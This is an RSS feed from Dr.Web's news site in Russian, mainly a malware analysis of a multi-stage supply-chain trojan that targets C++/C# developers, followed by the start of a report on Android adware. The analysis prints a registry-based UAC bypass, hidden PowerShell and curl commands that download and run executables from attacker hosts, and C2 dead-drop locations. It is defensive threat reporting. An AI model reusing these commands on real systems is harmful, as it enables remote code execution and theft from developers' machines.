<?xml version="1.0"?>
<rss version="2.0"><channel><title>О вирусах</title><link>https://news.drweb.uz/news/</link><description>Новости компании "Доктор Веб" - О вирусах</description><image><url>https://st.drweb.com/static/drweb_logo_uz.gif</url><link>https://news.drweb.uz/news/</link><title>Антивирус Dr.Web</title></image><item><guid>https://news.drweb.uz/show/?i=15276&amp;lng=uz</guid><title>Цель – разработчики. Новый троян атакует цепочки поставок и наносит комбинированный ущерб зараженным ПК</title><link>https://news.drweb.uz/show/?i=15276&amp;lng=uz&amp;c=9</link><pubDate>Fri, 10 Jul 2026 02:00:00 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Объектом исследования специалистов антивирусной лаборатории стала новая троянская программа. Она представляет собой угрозу типа supply chain attack, т.&amp;nbsp;е. атака на цепочки поставок. Отличительная черта этого ВПО&amp;nbsp;— фокус на проекты, созданные на языке программирования С++ и C#. Еще одна особенность&amp;nbsp;— повышенная опасность. Троян объединяет в себе ряд поражающих факторов, одновременно выполняя несколько функций: стилера, клиппера, бэкдора, майнера и источника заражения файлов.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Первые случаи распространения трояна были зафиксированы в последнем квартале 2025 года, с тех пор он постоянно модифицируется разработчиками. В основном он распространяется по интернету через зараженные .exe и python файлы. Процесс заражения многоступенчатый, разберем протекание каждой стадии и их цели одну за другой.&lt;/p&gt;&lt;h3&gt;Стадия 1. Trojan.DownLoader49.35384&lt;/h3&gt;&lt;p&gt;Специалисты «Доктор Веб» обнаружили множество зараженных легитимных приложений с похожей структурой. В изначальный исполняемый файл добавлен глобальный объект, а выполнение троянизированного приложения начинается с получения доступа к системным API через метод PEB walking. Далее стандартная функция initterm проходит таблицу указателей функций и инициализирует их, где одна из таких функций является вредоносной и запускает PowerShell команду. В некоторых версиях трояна эта нагрузка хранится в зашифрованном виде.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/1_VIR-DevRunTime-220526-1613-12.pdf-image-000.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/1_VIR-DevRunTime-220526-1613-12.pdf-image-000.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Запуск через initterm&lt;/i&gt;&lt;/p&gt;&lt;p&gt;PowerShell команда скачивает и выполняет вредоносный файл&amp;nbsp;&lt;a href="https://vms.drweb.uz/search/?q=Trojan.DownLoader49.35687&amp;lng=uz"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;, что означает запуск второй стадии.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/2_VIR-DevRunTime-220526-1613-12.pdf-image-002.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/2_VIR-DevRunTime-220526-1613-12.pdf-image-002.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Вредоносная PowerShell команда&lt;/i&gt;&lt;/p&gt;&lt;p&gt;В дополнение к исполняемым файлам были обнаружены файлы на языке Python (&lt;strong&gt;Python.Downloader.255&lt;/strong&gt;). В них тот же вредоносный код был зашифрован с помощью механизма симметричного шифрования Fernet. Он спрятан за простой обфускацией — множеством пробелов в первой строке. В этом случае выполнение также проходит в несколько этапов.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/3_VIR-DevRunTime-220526-1613-12.pdf-image-004.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/3_VIR-DevRunTime-220526-1613-12.pdf-image-004.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Вредоносные Python файлы&lt;/i&gt;&lt;/p&gt;&lt;h3&gt;Стадия 2. Trojan.DownLoader49.35687&lt;/h3&gt;&lt;p&gt;На этом этапе троян&amp;nbsp;&lt;a href="https://vms.drweb.uz/search/?q=Trojan.DownLoader49.35687&amp;lng=uz"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;&amp;nbsp;выполняет проверку своего запуска в песочнице. Кроме этого, он создает объект синхронизации mutex c именем Global\PFNMX (фиксированное значение). Пример подобного объекта: &lt;span class="string"&gt;\Sessions\1\BaseNamedObjects\Global\PFNMX_0o6u9MMc2QdKvqeHmgPRE008&lt;/span&gt;. Таким образом троян проверяет, не запущена ли ранее на компьютере другая копия.&lt;/p&gt;&lt;p&gt;Во время второй стадии троян пытается получить адреса C2 сервера с помощью публичных репозиториев GitHub и игровой платформы Steam. На них злоумышленники оставляют домены, которые троян считывает и использует как URL для загрузки третьей стадии — трояна &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt;.&lt;/p&gt;&lt;p&gt;Аккаунты Steam, созданные злоумышленниками, содержат название домена в открытом виде.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/4_VIR-DevRunTime-220526-1613-12.pdf-image-006.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/4_VIR-DevRunTime-220526-1613-12.pdf-image-006.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Аккаунт Steam с C2 доменом&lt;/i&gt;&lt;/p&gt;&lt;p&gt;На GitHub злоумышленники сохранили зашифрованный адрес C2 домена в виде raw файла: &lt;span class="string"&gt;raw[.]githubusercontent[.]com/XxXloverXxX/rustflare/refs/heads/main/crates/engine&lt;/span&gt;. Троян загружает этот файл и расшифровывает его сначала через Base64, а затем с помощью операции XOR с ключом ZwFlushKey.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/5_VIR-DevRunTime-220526-1613-12.pdf-image-008.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/5_VIR-DevRunTime-220526-1613-12.pdf-image-008.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Зашифрованные домены&lt;/i&gt;&lt;/p&gt;&lt;p&gt;После скачивания следующей стадии,&amp;nbsp;&lt;a href="https://vms.drweb.uz/search/?q=Trojan.DownLoader49.35687&amp;lng=uz"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;&amp;nbsp;внедряет ее в процесс одного из 41 заранее указанных исполняемых файлов из &lt;span class="string"&gt;C:\Windows\System32&lt;/span&gt;.&lt;/p&gt;&lt;p&gt;Адрес домена С2, с которым удалось установить связь, добавляется к прописанным в исходном коде трояна строкам и передается следующей стадии через именованный канал pipe\VccFramework.&lt;/p&gt;&lt;h3&gt;Стадия 3. BackDoor.Siggen2.5906&lt;/h3&gt;&lt;p&gt;На этой стадии происходит основная вредоносная деятельность. &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt; создает объект синхронизации mutex с фиксированным именем вида Global\PFNX_Side (фиксированное значение). Затем через ранее созданный канал троян получает данные от второй стадии, откуда извлекает идентификаторы трояна и домен С2, с которым &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt; будет коммуницировать.&lt;/p&gt;&lt;p&gt;Чтобы закрепиться в системе, троян скачивает файл «bungee.boo», который выполняет функции стадии 2 —&amp;nbsp;&lt;a href="https://vms.drweb.uz/search/?q=Trojan.DownLoader49.35687&amp;lng=uz"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;, и подменяет им DLL файлы:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;«profapi.dll» приложения Discord,&lt;/li&gt;&lt;li&gt;«domain_actions.dll» в папке «Domain Actions» и «well_known_domains.dll» в папке «Well Known Domains» приложения Microsoft Edge,&lt;/li&gt;&lt;li&gt;«C:\Windows\omadmapi.dll».&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Дополнительно &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt; может модифицировать системный реестр Windows таким образом, что при открытии архивированных файлов с помощью WinRar.exe будет запускаться вредоносный код.&lt;/p&gt;&lt;p&gt;Для действий с правами администратора троян использует технику обхода UAC. ВПО генерирует .vbs файл с названием из случайных цифр, в котором оставляет команду для выполнения с правами администратора. Далее через cmd.exe запускаются команды:&lt;/p&gt;&lt;div class="grid"&gt;&lt;pre&gt;&lt;code class="language-plaintext"&gt;reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe
%APPDATA%\Microsoft\369059.vbs" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
c start /B ComputerDefaults.exe
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Затем троян реализует 5 вредоносных функций: стилер, клиппер, бэкдор, майнер и источник заражения файлов.&lt;/p&gt;&lt;h3&gt;Стилер&lt;/h3&gt;&lt;p&gt;Троян способен красть различную информацию:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;токены Discord, которые позволяют войти в чужие аккаунты без ввода логина/пароля;&lt;/li&gt;&lt;li&gt;пароли и куки из браузеров Chrome, Edge, Opera, Brave, Yandex и др. Кроме обычных техник извлечения данных, может использовать файл CCCWF.tmp (&lt;strong&gt;Trojan.PWS.Siggen5.33623&lt;/strong&gt;). Он встраивается в браузер, а затем считывает пароли и сохраняет их в текстовые файлы;&lt;/li&gt;&lt;li&gt;папки Telegram Desktop;&lt;/li&gt;&lt;li&gt;папки криптокошелька Exodus.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Кроме хищений папок Exodus, троян производит модификацию криптокошелька. Для этого он находит файл app.asar и заменяет его на копию, скачанную с URL &lt;span class="string"&gt;balista[.]lol/Stb/PokerFace/RTApp[.]txt&lt;/span&gt; при помощи curl. В подмененной версии в index.js (&lt;strong&gt;Trojan.Siggen32.44702&lt;/strong&gt;) находится функция unlock(), которая при запуске отправляет мнемонические фразы кошелька на сервер злоумышленников.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/6_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-016.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/6_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-016.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Подмененный файл index.js&lt;/i&gt;&lt;/p&gt;&lt;h3&gt;Клиппер&lt;/h3&gt;&lt;p&gt;Особо опасная функция трояна. ВПО постоянно следит за буфером обмена пользователя: ищет данные банковских карт и отправляет их на сервер злоумышленников. Также вредонос заменяет адреса криптокошельков на подставные, которые получает от C2 сервера.&lt;/p&gt;&lt;h3&gt;Бэкдор&lt;/h3&gt;&lt;p&gt;Функциональность трояна позволяет злоумышленникам удаленно управлять зараженным ПК с помощью команд:&lt;/p&gt;&lt;div class="table-news-secondary"&gt;&lt;figure class="table"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;exc&lt;/td&gt;&lt;td&gt;скачать файл с url при помощи curl и запустить его&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;RVRS&lt;/td&gt;&lt;td&gt;запустить Reverse Proxy&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;RUNCMD&lt;/td&gt;&lt;td&gt;запустить команду через cmd&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;GETFILE&lt;/td&gt;&lt;td&gt;загрузить содержимое определенного файла на управляющий сервер&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;LISTDIR&lt;/td&gt;&lt;td&gt;отправить список файлов из определенной директории компьютера на управляющий сервер&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;TROLL&lt;/td&gt;&lt;td&gt;запустить команду для троллинга пользователя, есть опции earrape, scary_sound, rickroll, mute_audio, jumpscare_screamer и т.&amp;nbsp;д.&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/div&gt;&lt;h3&gt;Майнер&lt;/h3&gt;&lt;p&gt;При помощи curl троян скачивает с сервера и запускает файл &lt;span class="string"&gt;https://files[.]catbox[.]moe/lvh9j3[.]bin&lt;/span&gt;&amp;nbsp;— &lt;strong&gt;Trojan.Packed2.50953&lt;/strong&gt;. Своим строением и действиями он похож на стадию 2, только вместо &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt; он скачивает и внедряет &lt;strong&gt;Trojan.BtcMine.3956&lt;/strong&gt;. Этот майнер запускается только после определенного периода бездействия пользователя. ВПО использует инструменты &lt;a href="https://github.com/xmrig/xmrig" target="_blank" rel="noopener"&gt;XMRig&lt;/a&gt;, &lt;a href="https://github.com/trexminer/T-Rex" target="_blank" rel="noopener"&gt;T-Rex&lt;/a&gt; и &lt;a href="https://github.com/todxx/teamredminer/releases" target="_blank" rel="noopener"&gt;TeamRedMiner &lt;/a&gt;с открытым исходным кодом.&lt;/p&gt;&lt;h3&gt;Заражение файлов&lt;/h3&gt;&lt;p&gt;Главная отличительная черта этого трояна&amp;nbsp;— заражение файлов и дальнейшее самостоятельное распространение. Список заражаемых файлов:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;imgui_impl_win32.cpp,&lt;/li&gt;&lt;li&gt;.suo,&lt;/li&gt;&lt;li&gt;.exe,&lt;/li&gt;&lt;li&gt;winnetwk.h (Windows SDK),&lt;/li&gt;&lt;li&gt;.vcxproj и .csproj.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Чтобы определить пути к файлам, которые можно заразить, троян перебирает диски и запускает команду. Пример для диска A://&lt;/p&gt;&lt;div class="grid"&gt;&lt;pre&gt;&lt;code class="language-plaintext"&gt;dir /a /s /b A:\*imgui_impl_win32.cpp A:\*.suo A:\*.exe A:\*.vcxproj A:\*.csproj &amp;gt; %ALLUSERSPROFILE%\ADat.bin3290.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Злоумышленники строят свой расчет на том, что разработчики будут публиковать свои проекты с вредоносным кодом в открытом доступе. Другие разработчики, которые будут собирать, компилировать или модифицировать проект, автоматически заразят свои компьютеры из-за файлов &lt;span class="string"&gt;.suo&lt;/span&gt;, &lt;span class="string"&gt;.vcxproj&lt;/span&gt; и &lt;span class="string"&gt;.csproj&lt;/span&gt;, а обычные пользователи могут запустить зараженные исполняемые файлы, созданные с помощью скомпрометированных инструментов разработки.&lt;/p&gt;&lt;h3&gt;Файл imgui_impl_win32.cpp. Trojan.Loader.3129&lt;/h3&gt;&lt;p&gt;Файл &lt;span class="string"&gt;imgui_impl_win32.cpp&lt;/span&gt;&amp;nbsp;— часть популярной библиотеки Dear ImGui, отвечающей за графический интерфейс для языка программирования С++. Троян внедряет в файл две строки: первая содержит полезную нагрузку, вторая запускает ее.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/7_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-002.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/7_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-002.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Строка кода с полезной нагрузкой&lt;/i&gt;&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/8_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-004.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/8_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-004.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Строка кода с запуском пэйлоада&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Итог&amp;nbsp;— команда&lt;/p&gt;&lt;div class="grid"&gt;&lt;pre&gt;&lt;code class="language-plaintext"&gt;
start /min cmd.exe /c powershell -WindowStyle Hidden -Command "&amp;amp; { iwr -Uri 'https://exo-api[.]tf/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt' -OutFile $env:APPDATA\BK879002.exe; Start-Process -FilePath $env:APPDATA\BK879002.exe -WindowStyle Hidden }" 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Таким образом, библиотека оказывается зараженной и любые созданные пользователем приложения на С++ будут иметь в себе вредоносный код. При передаче или загрузке подобных приложений заражение будет распространяться дальше.&lt;/p&gt;&lt;h3&gt;Файлы .suo. Trojan.Loader.3138&lt;/h3&gt;&lt;p&gt;Это расширение файлов среды разработки Microsoft Visual Studio. В них хранятся настройки пользователя для определенных проектов. Троян заменяет оригинальный файл на зараженный, полученный с C2.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/9_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-006.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/9_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-006.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Зараженный файл&lt;/i&gt;&lt;/p&gt;&lt;p&gt;В результате при открытии проекта в Visual Studio запускается вредоносный код:&lt;/p&gt;&lt;div class="grid"&gt;&lt;pre&gt;&lt;code class="language-plaintext"&gt;
javascript:new ActiveXObject('WScript.Shell').Run('cmd /b /c curl -o \"C:\\ProgramData\\S47LY.exe\" \"https://pee-files[.]nl/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt\" &amp;amp;&amp;amp; start \"\" \"C:\\ProgramData\\S47LY.exe\"', 0, false);close();
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3&gt;Файлы winnetwk.h. Trojan.Loader.3184&lt;/h3&gt;&lt;p&gt;Windows SDK&amp;nbsp;— официальный набор инструментов Microsoft, который позволяет создавать приложения для ОС Windows.&lt;/p&gt;&lt;p&gt;С помощью реестра троян находит папку, куда установлен Windows SDK. В этой папке происходит поиск файла &lt;span class="string"&gt;winnetwk.h&lt;/span&gt;, ответственного за работу с сетевыми ресурсами. Затем в него добавляется вредоносный код.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/10_VIR-DevRunTime-220526-1613-12.pdf-image-010.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/10_VIR-DevRunTime-220526-1613-12.pdf-image-010.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Зараженный файл winnetwk.h&lt;/i&gt;&lt;/p&gt;&lt;p&gt;После этого все программы, созданные с помощью winnetwk.h, будут иметь вредоносный код, который запускает стадию 2.&lt;/p&gt;&lt;h3&gt;Файлы .exe&lt;/h3&gt;&lt;p&gt;Троян ищет подходящие .exe файлы и внедряет в них функции инициализации API и запуска initterm. Затем файл начинает работать как&amp;nbsp;&lt;a href="https://vms.drweb.uz/search/?q=Trojan.DownLoader49.35384&amp;lng=uz"&gt;&lt;b&gt;Trojan.DownLoader49.35384&lt;/b&gt;&lt;/a&gt;, он же стадия 1.&lt;/p&gt;&lt;h3&gt;Файлы .vcxproj (Trojan.Loader.3128, Trojan.Loader.3127) и .csproj (Trojan.Loader.3126)&lt;/h3&gt;&lt;p&gt;Это файлы проектов Visual Studio на языках программирования C++ и C#. В них добавляется команда PreBuildEvent, которая запускается перед каждой сборкой проекта. Ранние версии трояна добавляли код, подобный стадии 1.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/11_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-012.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/11_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-012.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Ранняя версия кода&lt;/i&gt;&lt;/p&gt;&lt;p&gt;В новых версиях код стал сложнее, появилась дополнительная обфускация.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/12_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-014.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/12_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-014.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Новая версия кода&lt;/i&gt;&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/13_Clipboard-28_мая_2026_г_15_07_16.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/13_Clipboard-28_мая_2026_г_15_07_16.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Один из этапов выполнения &lt;strong&gt;Trojan.Loader.3128&lt;/strong&gt;&lt;/i&gt;&lt;/p&gt;&lt;p&gt;В результате вредоносной команды записывается вредоносный .vbs файл, который, в свою очередь, запускает PowerShell payload. Троян делает запрос к URL-адресам:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;youtu.be/akoxddx6lgc,&lt;/li&gt;&lt;li&gt;steamcommunity.com/profiles/76561198737324192.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;На этих адресах хранится другой URL-адрес, зашифрованный с помощью base64.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/14_VIR-DevRunTime-220526-1613-12.pdf-image-012.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/14_VIR-DevRunTime-220526-1613-12.pdf-image-012.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;YouTube-аккаунт с зашифрованным URL-адресом&lt;/i&gt;&lt;/p&gt;&lt;p&gt;После расшифровки троян получает C2 домен, к которому обращается за нагрузкой, сходной со стадией 2.&lt;/p&gt;&lt;p&gt;Описание работы трояна позволяет сделать вывод, что он представляет повышенную опасность из-за комбинирования целого ряда вредоносных функций. Во избежание заражения своего компьютера и дальнейшего распространения трояна рекомендуем регулярно обновлять антивирусные базы и проверять все скачанные из интернета файлы. Пользователи антивируса Dr.Web Security Space и Dr.Web Desktop Security Suite могут быть спокойны, поскольку троян надежно определяется и удаляется антивирусами Dr.Web. Файлы типа .vcxproj, .csproj и imgui лечатся, из них удаляется вредоносный код.&lt;/p&gt;

&lt;p&gt;Подробнее&amp;nbsp;об&amp;nbsp;&lt;a href="https://vms.drweb.uz/search/?q=Trojan.DownLoader49.35384&amp;lng=uz"&gt;&lt;b&gt;Trojan.DownLoader49.35384&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Подробнее&amp;nbsp;об&amp;nbsp;&lt;a href="https://vms.drweb.uz/search/?q=Trojan.DownLoader49.35687&amp;lng=uz"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Подробнее&amp;nbsp;об&amp;nbsp;&lt;a href="https://vms.drweb.uz/search/?q=BackDoor.Siggen2.5906&amp;lng=uz"&gt;&lt;b&gt;BackDoor.Siggen2.5906&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Подробнее&amp;nbsp;об&amp;nbsp;&lt;a href="https://vms.drweb.uz/search/?q=Trojan.BtcMine.3956&amp;lng=uz"&gt;&lt;b&gt;Trojan.BtcMine.3956&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/DevRuntime/README.adoc" target="_blank" rel="noopener"&gt;Индикаторы компрометации&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.uz/show/?i=15262&amp;lng=uz</guid><title>Троян Android.MagicAd показывает рекламу вопреки всем ограничениям</title><link>https://news.drweb.uz/show/?i=15262&amp;lng=uz&amp;c=9</link><pubDate>Thu, 04 Jun 2026 04:00:00 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Специалисты антивирусной лаборатории компании «Доктор Веб» обнаружили троянскую программу Android.MagicAd, которая различными способами обходит ограничения ОС&amp;nbsp;Android и&amp;nbsp;показывает рекламу при работе в&amp;nbsp;фоне. Один из&amp;nbsp;этих методов является универсальным, другие рассчитаны на&amp;nbsp;устройства определенных производителей. Среди них&amp;nbsp;&amp;mdash; эксплуатация сторонних приложений, а&amp;nbsp;также использование системного медиаплеера.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.uz/search/?q=Android.MagicAd.1&amp;lng=uz"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; распространялся через официальный каталог приложений для устройств Xiaomi GetApps и&amp;nbsp;скрывался в&amp;nbsp;более чем 50&amp;nbsp;различных играх и&amp;nbsp;программах. Они появлялись в&amp;nbsp;магазине на&amp;nbsp;короткий срок&amp;nbsp;&amp;mdash; чаще всего до&amp;nbsp;месяца, после чего пропадали, и&amp;nbsp;вместо них появлялись новые. Возможно, таким образом злоумышленники пытались защитить &lt;a href="https://vms.drweb.uz/search/?q=Android.MagicAd.1&amp;lng=uz"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; от&amp;nbsp;преждевременного обнаружения, сохранив при этом его активность: после удаления из&amp;nbsp;магазина троянские программы продолжают оставаться на&amp;nbsp;устройствах пользователей и&amp;nbsp;могут и&amp;nbsp;дальше выполнять вредоносную деятельность. В&amp;nbsp;настоящее время ни&amp;nbsp;одно из&amp;nbsp;выявленных нами приложений с&amp;nbsp;&lt;a href="https://vms.drweb.uz/search/?q=Android.MagicAd.1&amp;lng=uz"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;не доступно для загрузки в&amp;nbsp;каталоге GetApps, а&amp;nbsp;у&amp;nbsp;распространявших их&amp;nbsp;разработчиков перестали появляться новые программы с&amp;nbsp;трояном.&lt;/p&gt;

&lt;p&gt;Проведенное вирусными аналитиками &amp;laquo;Доктор Веб&amp;raquo; исследование показало, что первые версии &lt;a href="https://vms.drweb.uz/search/?q=Android.MagicAd.1&amp;lng=uz"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; появились в&amp;nbsp;2025 году и&amp;nbsp;помимо каталога GetApps также встречались в&amp;nbsp;Samsung Galaxy Store.&lt;/p&gt;

&lt;div class="img img-two"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/01_Android.MagicAd_store_1.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/01_Android.MagicAd_store_1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/02_Android.MagicAd_store_2.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/02_Android.MagicAd_store_2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;i&gt;Примеры игр и&amp;nbsp;программ из&amp;nbsp;каталога GetApps, в&amp;nbsp;которых скрывался Android.MagicAd.1. На&amp;nbsp;момент публикации нашей новости эти и&amp;nbsp;другие модификации трояна стали недоступны для скачивания&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Часть вредоносной функциональности &lt;a href="https://vms.drweb.uz/search/?q=Android.MagicAd.1&amp;lng=uz"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; находится в&amp;nbsp;dex-модулях, которые скрыты в&amp;nbsp;зашифрованных нативных библиотеках в&amp;nbsp;каталоге с&amp;nbsp;файловыми ресурсами трояна. В&amp;nbsp;процессе работы он&amp;nbsp;расшифровывает эти библиотеки, извлекает из&amp;nbsp;них свои компоненты и&amp;nbsp;запускает.&lt;/p&gt;

